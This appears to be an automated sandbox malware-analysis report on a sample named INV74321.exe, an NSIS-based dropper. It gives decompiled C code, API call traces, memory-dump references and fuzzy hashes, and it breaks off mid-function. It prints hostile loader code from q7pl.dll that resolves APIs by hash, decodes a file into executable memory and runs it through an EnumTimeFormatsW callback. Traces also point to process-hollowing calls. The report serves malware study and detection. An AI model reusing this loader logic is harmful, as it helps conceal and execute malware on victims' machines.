                                                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsi6113.tmp\q7pl.dll$GHFGHFGHFDGDFGDFg
                                                          • API String ID: 1941528284-102923910
                                                          • Opcode ID: f339b6a59adf296648f3f8b3866004a1f68460c5fd538596058490c9e85b0c89
                                                          • Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
                                                          • Opcode Fuzzy Hash: f339b6a59adf296648f3f8b3866004a1f68460c5fd538596058490c9e85b0c89
                                                          • Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 023F1475
                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 023F14CE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.221408665.00000000023F0000.00000040.00000001.sdmp, Offset: 023F0000, based on PE: false
                                                          Similarity
                                                          • API ID: AllocCreateFileVirtual
                                                          • String ID: 7c29470aad6945a9aae145c599eec3a6
                                                          • API String ID: 1475775534-1095801799
                                                          • Opcode ID: 0b15ef546eea175f4c459f7bae9adaee947352e8bee050cf48af17720ef95cf1
                                                          • Instruction ID: feaa23785904b9fab1fbd7b7b33b8ba442c81be2e162d04d40d06772f6c6de40
                                                          • Opcode Fuzzy Hash: 0b15ef546eea175f4c459f7bae9adaee947352e8bee050cf48af17720ef95cf1
                                                          • Instruction Fuzzy Hash: C4D13930D44388EEEF61DBE4EC05BEDBBB6AF04710F14409AE648BA191D7B50A84DB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 023F07F3
                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 023F09C0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.221408665.00000000023F0000.00000040.00000001.sdmp, Offset: 023F0000, based on PE: false
                                                          Similarity
                                                          • API ID: CreateFileFreeVirtual
                                                          • String ID:
                                                          • API String ID: 204039940-0
                                                          • Opcode ID: 1a130295db4accc40e27706ea50130c96f412ff03570a98c8799038c82ee0c03
                                                          • Instruction ID: b4f349155db243ffa6a359e8830f956caf706fef939748d312d1233b7dd47597
                                                          • Opcode Fuzzy Hash: 1a130295db4accc40e27706ea50130c96f412ff03570a98c8799038c82ee0c03
                                                          • Instruction Fuzzy Hash: 3EA10530D00209EFEF54DFE8E985BADBBB2BF08315F204459EA55BA2A1D3755A40DF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 95%
                                                          			E004030D8(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                          				signed int _v8;
                                                          				int _v12;
                                                          				intOrPtr _v16;
                                                          				long _v20;
                                                          				intOrPtr _v24;
                                                          				char _v88;
                                                          				void* _t65;
                                                          				void* _t69;
                                                          				long _t70;
                                                          				intOrPtr _t75;
                                                          				long _t76;
                                                          				intOrPtr _t77;
                                                          				void* _t78;
                                                          				int _t88;
                                                          				intOrPtr _t92;
                                                          				intOrPtr _t95;
                                                          				long _t96;
                                                          				signed int _t97;
                                                          				int _t98;
                                                          				int _t99;
                                                          				intOrPtr _t100;
                                                          				void* _t101;
                                                          				void* _t102;
                                                          
                                                          				_t97 = _a16;
                                                          				_t92 = _a12;
                                                          				_v12 = _t97;
                                                          				if(_t92 == 0) {
                                                          					_v12 = 0x8000;
                                                          				}
                                                          				_v8 = _v8 & 0x00000000;
                                                          				_v16 = _t92;
                                                          				if(_t92 == 0) {
                                                          					_v16 = 0x421448;
                                                          				}
                                                          				_t62 = _a4;
                                                          				if(_a4 >= 0) {
                                                          					E00403300( *0x42f498 + _t62);
                                                          				}
                                                          				if(E004032EA( &_a16, 4) == 0) {
                                                          					L41:
                                                          					_push(0xfffffffd);
                                                          					goto L42;
                                                          				} else {
                                                          					if((_a19 & 0x00000080) == 0) {
                                                          						if(_t92 != 0) {
                                                          							if(_a16 < _t97) {
                                                          								_t97 = _a16;
                                                          							}
                                                          							if(E004032EA(_t92, _t97) != 0) {
                                                          								_v8 = _t97;
                                                          								L44:
                                                          								return _v8;
                                                          							} else {
                                                          								goto L41;
                                                          							}
                                                          						}
                                                          						if(_a16 <= _t92) {
                                                          							goto L44;
                                                          						}
                                                          						_t88 = _v12;
                                                          						while(1) {
                                                          							_t98 = _a16;
                                                          							if(_a16 >= _t88) {
                                                          								_t98 = _t88;
                                                          							}
                                                          							if(E004032EA(0x41d448, _t98) == 0) {
                                                          								goto L41;
                                                          							}
                                                          							_t69 = E00405D37(_a8, 0x41d448, _t98); // executed
                                                          							if(_t69 == 0) {
                                                          								L28:
                                                          								_push(0xfffffffe);
                                                          								L42:
                                                          								_pop(_t65);
                                                          								return _t65;
                                                          							}
                                                          							_v8 = _v8 + _t98;
                                                          							_a16 = _a16 - _t98;
                                                          							if(_a16 > 0) {
                                                          								continue;
                                                          							}
                                                          							goto L44;
                                                          						}
                                                          						goto L41;
                                                          					}
                                                          					_t70 = GetTickCount();
                                                          					 *0x40bdac =  *0x40bdac & 0x00000000;
                                                          					 *0x40bda8 =  *0x40bda8 & 0x00000000;
                                                          					_t14 =  &_a16;
                                                          					 *_t14 = _a16 & 0x7fffffff;
                                                          					_v20 = _t70;
                                                          					 *0x40b890 = 8;
                                                          					 *0x415438 = 0x40d430;
                                                          					 *0x415434 = 0x40d430;
                                                          					 *0x415430 = 0x415430;
                                                          					_a4 = _a16;
                                                          					if( *_t14 <= 0) {
                                                          						goto L44;
                                                          					} else {
                                                          						goto L9;
                                                          					}
                                                          					while(1) {
                                                          						L9:
                                                          						_t99 = 0x4000;
                                                          						if(_a16 < 0x4000) {
                                                          							_t99 = _a16;
                                                          						}
                                                          						if(E004032EA(0x41d448, _t99) == 0) {
                                                          							goto L41;
                                                          						}
                                                          						_a16 = _a16 - _t99;
                                                          						 *0x40b880 = 0x41d448;
                                                          						 *0x40b884 = _t99;
                                                          						while(1) {
                                                          							_t95 = _v16;
                                                          							 *0x40b888 = _t95;
                                                          							 *0x40b88c = _v12;
                                                          							_t75 = E00406625(0x40b880);
                                                          							_v24 = _t75;
                                                          							if(_t75 < 0) {
                                                          								break;
                                                          							}
                                                          							_t100 =  *0x40b888; // 0x422448
                                                          							_t101 = _t100 - _t95;
                                                          							_t76 = GetTickCount();
                                                          							_t96 = _t76;
                                                          							if(( *0x42f4f4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                                                          								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                          								_t102 = _t102 + 0xc;
                                                          								E0040521E(0,  &_v88);
                                                          								_v20 = _t96;
                                                          							}
                                                          							if(_t101 == 0) {
                                                          								if(_a16 > 0) {
                                                          									goto L9;
                                                          								}
                                                          								goto L44;
                                                          							} else {
                                                          								if(_a12 != 0) {
                                                          									_t77 =  *0x40b888; // 0x422448
                                                          									_v8 = _v8 + _t101;
                                                          									_v12 = _v12 - _t101;
                                                          									_v16 = _t77;
                                                          									L23:
                                                          									if(_v24 != 1) {
                                                          										continue;
                                                          									}
                                                          									goto L44;
                                                          								}
                                                          								_t78 = E00405D37(_a8, _v16, _t101); // executed
                                                          								if(_t78 == 0) {
                                                          									goto L28;
                                                          								}
                                                          								_v8 = _v8 + _t101;
                                                          								goto L23;
                                                          							}
                                                          						}
                                                          						_push(0xfffffffc);
                                                          						goto L42;
                                                          					}
                                                          					goto L41;
                                                          				}
                                                          			}


























                                                          0x004031e6
                                                          0x004031ef
                                                          0x004031f1
                                                          0x0040321f
                                                          0x00403225
                                                          0x0040322e
                                                          0x00403233
                                                          0x00403233
                                                          0x00403238
                                                          0x00403273
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040323a
                                                          0x0040323e
                                                          0x00403255
                                                          0x0040325a
                                                          0x0040325d
                                                          0x00403260
                                                          0x00403263
                                                          0x00403267
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040326d
                                                          0x00403247
                                                          0x0040324e
                                                          0x00000000
                                                          0x00000000
                                                          0x00403250
                                                          0x00000000
                                                          0x00403250
                                                          0x00403238
                                                          0x0040327b
                                                          0x00000000
                                                          0x0040327b
                                                          0x00000000
                                                          0x00403188

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: CountTick$wsprintf
                                                          • String ID: ... %d%%$H$B
                                                          • API String ID: 551687249-630640294
                                                          • Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                          • Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
                                                          • Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                          • Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004056E4(CHAR* _a4) {
                                                          				struct _SECURITY_ATTRIBUTES _v16;
                                                          				struct _SECURITY_DESCRIPTOR _v36;
                                                          				int _t22;
                                                          				long _t23;
                                                          
                                                          				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                          				_v36.Owner = 0x408384;
                                                          				_v36.Group = 0x408384;
                                                          				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                          				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                          				_v16.lpSecurityDescriptor =  &_v36;
                                                          				_v36.Revision = 1;
                                                          				_v36.Control = 4;
                                                          				_v36.Dacl = 0x408374;
                                                          				_v16.nLength = 0xc;
                                                          				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
                                                          				if(_t22 != 0) {
                                                          					L1:
                                                          					return 0;
                                                          				}
                                                          				_t23 = GetLastError();
                                                          				if(_t23 == 0xb7) {
                                                          					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
                                                          						goto L1;
                                                          					}
                                                          					return GetLastError();
                                                          				}
                                                          				return _t23;
                                                          			}








                                                          APIs
                                                          • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                          • GetLastError.KERNEL32 ref: 0040573B
                                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
                                                          • GetLastError.KERNEL32 ref: 0040575A
                                                          Strings
                                                          • C:\Users\user\Desktop, xrefs: 004056E4
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040570A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                          • API String ID: 3449924974-3254906087
                                                          • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                          • Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
                                                          • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                          • Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00406492(intOrPtr _a4) {
                                                          				char _v292;
                                                          				int _t10;
                                                          				struct HINSTANCE__* _t14;
                                                          				void* _t16;
                                                          				void* _t21;
                                                          
                                                          				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                                                          				if(_t10 > 0x104) {
                                                          					_t10 = 0;
                                                          				}
                                                          				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                                                          					_t16 = 1;
                                                          				} else {
                                                          					_t16 = 0;
                                                          				}
                                                          				_t5 = _t16 + 0x40a014; // 0x5c
                                                          				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                                                          				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
                                                          				return _t14;
                                                          			}









                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32 ref: 004064A9
                                                          • wsprintfA.USER32 ref: 004064E2
                                                          • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%s.dll$UXTHEME$\
                                                          • API String ID: 2200240437-4240819195
                                                          • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                          • Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
                                                          • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                          • Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405CBF(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                          				char _t11;
                                                          				signed int _t12;
                                                          				int _t15;
                                                          				signed int _t17;
                                                          				void* _t20;
                                                          				CHAR* _t21;
                                                          
                                                          				_t21 = _a4;
                                                          				_t20 = 0x64;
                                                          				while(1) {
                                                          					_t11 =  *0x40a3d4; // 0x61736e
                                                          					_t20 = _t20 - 1;
                                                          					_a4 = _t11;
                                                          					_t12 = GetTickCount();
                                                          					_t17 = 0x1a;
                                                          					_a6 = _a6 + _t12 % _t17;
                                                          					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
                                                          					if(_t15 != 0) {
                                                          						break;
                                                          					}
                                                          					if(_t20 != 0) {
                                                          						continue;
                                                          					}
                                                          					 *_t21 =  *_t21 & 0x00000000;
                                                          					return _t15;
                                                          				}
                                                          				return _t21;
                                                          			}










                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405CD3
                                                          • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED
                                                          Strings
                                                          • "C:\Users\user\Desktop\INV74321.exe" , xrefs: 00405CBF
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC2
                                                          • nsa, xrefs: 00405CCA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: "C:\Users\user\Desktop\INV74321.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                          • API String ID: 1716503409-4086940424
                                                          • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                          • Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
                                                          • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                          • Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 023F035F
                                                          • GetThreadContext.KERNELBASE(?,00010007), ref: 023F0382
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 023F03A6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.221408665.00000000023F0000.00000040.00000001.sdmp, Offset: 023F0000, based on PE: false
                                                          Similarity
                                                          • API ID: Process$ContextCreateMemoryReadThread
                                                          • String ID:
                                                          • API String ID: 2411489757-0
                                                          • Opcode ID: 9ab73ef7de48d51c71e97c04d82d2190dffc703efa1e1da09acdc765575b9a47
                                                          • Instruction ID: b2028598306373e0be2737bee1f4949d12694ba32dc0803a9ec04848777198ea
                                                          • Opcode Fuzzy Hash: 9ab73ef7de48d51c71e97c04d82d2190dffc703efa1e1da09acdc765575b9a47
                                                          • Instruction Fuzzy Hash: A8221831E40218EEEF64DBA8ED45BADB7B5FF44705F10409AE608FA2A1D7749A80CF15
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 79%
                                                          			E10001120(void* __eflags) {
                                                          				signed int _v5;
                                                          				signed int _v12;
                                                          				intOrPtr _v16;
                                                          				void* _v20;
                                                          				long _v24;
                                                          				long _v28;
                                                          				intOrPtr _v32;
                                                          				intOrPtr _v36;
                                                          				intOrPtr _v40;
                                                          				intOrPtr _v44;
                                                          				void* _v48;
                                                          				intOrPtr _v52;
                                                          				short _v572;
                                                          				int _t99;
                                                          
                                                          				_v12 = 0;
                                                          				_v28 = 0;
                                                          				_v16 = E10001000();
                                                          				_v40 = E10001070(_v16, 0x8a111d91);
                                                          				_v32 = E10001070(_v16, 0xcbec1a0);
                                                          				_v36 = E10001070(_v16, 0xa4f84a9a);
                                                          				_v52 = E10001070(_v16, 0x433a3842);
                                                          				_v44 = E10001070(_v16, 0xa5f15738);
                                                          				_v32(0x103,  &_v572);
                                                          				_v36( &_v572, 0x10003000);
                                                          				_v48 = CreateFileW( &_v572, 0x80000000, 7, 0, 3, 0x80, 0);
                                                          				_v24 = 0x1a05;
                                                          				_v20 = VirtualAlloc(0, _v24, 0x3000, 0x40);
                                                          				ReadFile(_v48, _v20, _v24,  &_v28, 0);
                                                          				_v12 = 0;
                                                          				while(_v12 < _v28) {
                                                          					_v5 =  *((intOrPtr*)(_v20 + _v12));
                                                          					_v5 = _v5 & 0x000000ff ^ _v12;
                                                          					_v5 = (_v5 & 0x000000ff) + _v12;
                                                          					_v5 =  ~(_v5 & 0x000000ff);
                                                          					_v5 = _v5 & 0x000000ff ^ 0x00000029;
                                                          					_v5 = (_v5 & 0x000000ff) - _v12;
                                                          					_v5 = _v5 & 0x000000ff ^ _v12;
                                                          					_v5 = (_v5 & 0x000000ff) - 0x8a;
                                                          					_v5 =  !(_v5 & 0x000000ff);
                                                          					_v5 = (_v5 & 0x000000ff) - 0x6d;
                                                          					_v5 =  !(_v5 & 0x000000ff);
                                                          					_v5 = _v5 & 0x000000ff ^ 0x0000003b;
                                                          					_v5 =  ~(_v5 & 0x000000ff);
                                                          					_v5 =  !(_v5 & 0x000000ff);
                                                          					_v5 =  ~(_v5 & 0x000000ff);
                                                          					_v5 =  !(_v5 & 0x000000ff);
                                                          					_v5 = (_v5 & 0x000000ff) - 0x71;
                                                          					_v5 =  ~(_v5 & 0x000000ff);
                                                          					_v5 = (_v5 & 0x000000ff) - _v12;
                                                          					 *((char*)(_v20 + _v12)) = _v5;
                                                          					_v12 = _v12 + 1;
                                                          				}
                                                          				_t99 = EnumTimeFormatsW(_v20, 0, 0); // executed
                                                          				return _t99;
                                                          			}


















                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 100011DA
                                                          • VirtualAlloc.KERNELBASE(00000000,00001A05,00003000,00000040), ref: 100011F4
                                                          • ReadFile.KERNELBASE(?,?,00001A05,00000000,00000000), ref: 1000120C
                                                          • EnumTimeFormatsW.KERNELBASE(?,00000000,00000000), ref: 100012FF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.223616623.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.223600653.0000000010000000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.223633299.0000000010002000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: File$AllocCreateEnumFormatsReadTimeVirtual
                                                          • String ID:
                                                          • API String ID: 2368423067-0
                                                          • Opcode ID: 5f2e7b33338f4b70763c084f4509b78a69750c420f203546721e98bf2f2c58da
                                                          • Instruction ID: 2dd11465bb008b5e9aa66c17f2e67835f16e68c2c4290183200e47672db65918
                                                          • Opcode Fuzzy Hash: 5f2e7b33338f4b70763c084f4509b78a69750c420f203546721e98bf2f2c58da
                                                          • Instruction Fuzzy Hash: EF514D74D4C398BEDF01CBF48891BEDBFB4AF5A201F0481C9E590B6286D636574ACB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 60%
                                                          			E0040209D(void* __ebx, void* __eflags) {
                                                          				struct HINSTANCE__* _t18;
                                                          				struct HINSTANCE__* _t26;
                                                          				void* _t27;
                                                          				struct HINSTANCE__* _t30;
                                                          				CHAR* _t32;
                                                          				intOrPtr* _t33;
                                                          				void* _t34;
                                                          
                                                          				_t27 = __ebx;
                                                          				asm("sbb eax, 0x42f4f8");
                                                          				 *(_t34 - 4) = 1;
                                                          				if(__eflags < 0) {
                                                          					_push(0xffffffe7);
                                                          					L15:
                                                          					E00401423();
                                                          					L16:
                                                          					 *0x42f4c8 =  *0x42f4c8 +  *(_t34 - 4);
                                                          					return 0;
                                                          				}
                                                          				_t32 = E00402BCE(0xfffffff0);
                                                          				 *(_t34 + 8) = E00402BCE(1);
                                                          				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                                                          					L3:
                                                          					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                                                          					_t30 = _t18;
                                                          					if(_t30 == _t27) {
                                                          						_push(0xfffffff6);
                                                          						goto L15;
                                                          					}
                                                          					L4:
                                                          					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                          					if(_t33 == _t27) {
                                                          						E0040521E(0xfffffff7,  *(_t34 + 8));
                                                          					} else {
                                                          						 *(_t34 - 4) = _t27;
                                                          						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                                                          							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b878, 0x40a000); // executed
                                                          						} else {
                                                          							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                                                          							if( *_t33() != 0) {
                                                          								 *(_t34 - 4) = 1;
                                                          							}
                                                          						}
                                                          					}
                                                          					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004038AA(_t30) != 0) {
                                                          						FreeLibrary(_t30);
                                                          					}
                                                          					goto L16;
                                                          				}
                                                          				_t26 = GetModuleHandleA(_t32); // executed
                                                          				_t30 = _t26;
                                                          				if(_t30 != __ebx) {
                                                          					goto L4;
                                                          				}
                                                          				goto L3;
                                                          			}











                                                          APIs
                                                          • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00422448,74B5EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00422448,74B5EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                            • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00422448,74B5EA30), ref: 0040527A
                                                            • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2987980305-0
                                                          • Opcode ID: 7d01c9a26376e903ef8f956939bf13d5e0cf1485282589c35b64df24d5e4481f
                                                          • Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
                                                          • Opcode Fuzzy Hash: 7d01c9a26376e903ef8f956939bf13d5e0cf1485282589c35b64df24d5e4481f
                                                          • Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 87%
                                                          			E004015BB(char __ebx, void* __eflags) {
                                                          				void* _t13;
                                                          				int _t19;
                                                          				char _t21;
                                                          				void* _t22;
                                                          				char _t23;
                                                          				signed char _t24;
                                                          				char _t26;
                                                          				CHAR* _t28;
                                                          				char* _t32;
                                                          				void* _t33;
                                                          
                                                          				_t26 = __ebx;
                                                          				_t28 = E00402BCE(0xfffffff0);
                                                          				_t13 = E00405B28(_t28);
                                                          				_t30 = _t13;
                                                          				if(_t13 != __ebx) {
                                                          					do {
                                                          						_t32 = E00405ABA(_t30, 0x5c);
                                                          						_t21 =  *_t32;
                                                          						 *_t32 = _t26;
                                                          						 *((char*)(_t33 + 0xb)) = _t21;
                                                          						if(_t21 != _t26) {
                                                          							L5:
                                                          							_t22 = E00405761(_t28);
                                                          						} else {
                                                          							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                                                          							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040577E(_t39) == 0) {
                                                          								goto L5;
                                                          							} else {
                                                          								_t22 = E004056E4(_t28); // executed
                                                          							}
                                                          						}
                                                          						if(_t22 != _t26) {
                                                          							if(_t22 != 0xb7) {
                                                          								L9:
                                                          								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                          							} else {
                                                          								_t24 = GetFileAttributesA(_t28); // executed
                                                          								if((_t24 & 0x00000010) == 0) {
                                                          									goto L9;
                                                          								}
